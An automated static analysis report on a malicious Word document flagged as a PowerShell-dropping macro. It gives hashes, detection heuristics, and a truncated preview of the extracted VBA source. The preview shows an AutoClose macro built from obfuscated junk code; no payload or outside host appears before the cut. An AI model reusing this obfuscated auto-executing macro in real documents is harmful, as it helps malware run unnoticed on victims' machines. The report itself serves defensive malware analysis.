Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6421e023e294d185…

MALICIOUS

Office (OLE)

222.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 824cd3f40fc708abd49ae84f878fd984 SHA-1: 4f6cc57c31c1ba81a718b72b0f04521894573ea6 SHA-256: 6421e023e294d1855a7a17aa76447096406967835bf623302e4b6689f35270af
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a legacy WordBasic AutoClose macro. This macro is designed to execute automatically when the document is closed, indicating an attempt to run a secondary payload. The ClamAV detection name 'Doc.Malware.Pwshell-6700199-0' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Malware.Pwshell-6700199-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Pwshell-6700199-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 100597 bytes
SHA-256: 8408a66982798d02df2c2181b1ea9dba71ea6f11032b7c57f4b15be1ab04ff7c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const taHuZIFIqEVIDvUfegATUvycUWubu = 0
Sub AutoClose()
On Error Resume Next
Dim auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(5)

If LenB("kEmEVaziqAfyVUgOKJaz") < 83419 Then
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(0) = VarType(Sqr(8341) + CInt("8341"))
Dim DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(5)

If LenB("wOmAWUHyCEiAGIi") < 15927 Then
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(0) = VarType(Sqr(1592) + CInt("1592"))
End If
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(1) = LTrim("wOmAWUHyCEiAGIi") & "77"
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(2) = Day(15921592)

If Len("DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk") < Len("wOmAWUHyCEiAGIi") Then
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(3) = Weekday(15927)
End If
End If
Dim aYzYNASEiANesCYFToXYwusCiL(5)

If LenB("aeWoqavaXus") < 33197 Then
aYzYNASEiANesCYFToXYwusCiL(0) = VarType(Sqr(3319) + CInt("3319"))
End If
aYzYNASEiANesCYFToXYwusCiL(1) = LTrim("aeWoqavaXus") & "77"
aYzYNASEiANesCYFToXYwusCiL(2) = Day(33193319)

If Len("aYzYNASEiANesCYFToXYwusCiL") < Len("aeWoqavaXus") Then
aYzYNASEiANesCYFToXYwusCiL(3) = Weekday(33197)
End If
Dim tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(5)

If LenB("KYVEZubiJJeFE") < 64511 Then
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(0) = VarType(Sqr(6451) + CInt("6451"))
End If
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(1) = LTrim("KYVEZubiJJeFE") & "11"
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(2) = Day(64516451)

If Len("tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu") < Len("KYVEZubiJJeFE") Then
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(3) = Weekday(64511)
End If
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(1) = LTrim("kEmEVaziqAfyVUgOKJaz") & "99"
Dim aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(5)

If LenB("iUjeRyhUkkuzyBoQasYq") < 42362 Then
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(0) = VarType(Sqr(4236) + CInt("4236"))
End If
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(1) = LTrim("iUjeRyhUkkuzyBoQasYq") & "22"
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(2) = Day(42364236)

If Len("aeMYWYqydezYLANiMusTumuiEvefUEZeraSii") < Len("iUjeRyhUkkuzyBoQasYq") Then
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(3) = Weekday(42362)
End If
Dim HEdiZyXezOMopUGsYgOROvAxmFU(5)

If LenB("peMyPaQObuzYpaHAfoKSu") < 93105 Then
HEdiZyXezOMopUGsYgOROvAxmFU(0) = VarType(Sqr(9310) + CInt("9310"))
End If
HEdiZyXezOMopUGsYgOROvAxmFU(1) = LTrim("peMyPaQObuzYpaHAfoKSu") & "55"
HEdiZyXezOMopUGsYgOROvAxmFU(2) = Day(93109310)

If Len("HEdiZyXezOMopUGsYgOROvAxmFU") < Len("peMyPaQObuzYpaHAfoKSu") Then
HEdiZyXezOMopUGsYgOROvAxmFU(3) = Weekday(93105)
End If
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(2) = Day(83418341)
Dim xeZAqiquZIfukodIrQEGHugutuKOKEtE(5)

If LenB("NexUTuhYdEc") < 76205 Then
xeZAqiquZIfukodIrQEGHugutuKOKEtE(0) = VarType(Sqr(7620) + CInt("7620"))
End If
xeZAqiquZIfukodIrQEGHugutuKOKEtE(1) = LTrim("NexUTuhYdEc") & "55"
xeZAqiquZIfukodIrQEGHugutuKOKEtE(2) = Day(76207620)

If Len("xeZAqiquZIfukodIrQEGHugutuKOKEtE") < Len("NexUTuhYdEc") Then
xeZAqiquZIfukodIrQEGHugutuKOKEtE(3) = Weekday(76205)
End If

If Len("auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe") < Len("kEmEVaziqAfyVUgOKJaz") Then
Dim XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(5)

If LenB("xUFQyTuBItoReaov") < 28739 Then
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(0) = VarType(Sqr(2873) + CInt("2873"))
End If
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(1) = LTrim("xUFQyTuBItoReaov") & "99"
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(2) = Day(28732873)

If Len("XbyBERuvOnaJUvyDQseJoZOfAmaXiKa") < Len("xUFQyTuBItoReaov") Then
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(3) = Weekday(28739)
End If
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(3) = Weekday(83419)
End If
Dim hIvERpovUDukItICnabyHozUHedudaCuXic(5)

If LenB("xaSISykaKOjuXUcizOqEqip") < 99713 Then
Dim xaMuvakZYBETOpEgEtmoNysoSeABIjESAF(5)

If LenB("BavORoMAmaraHIDEf")
... (truncated)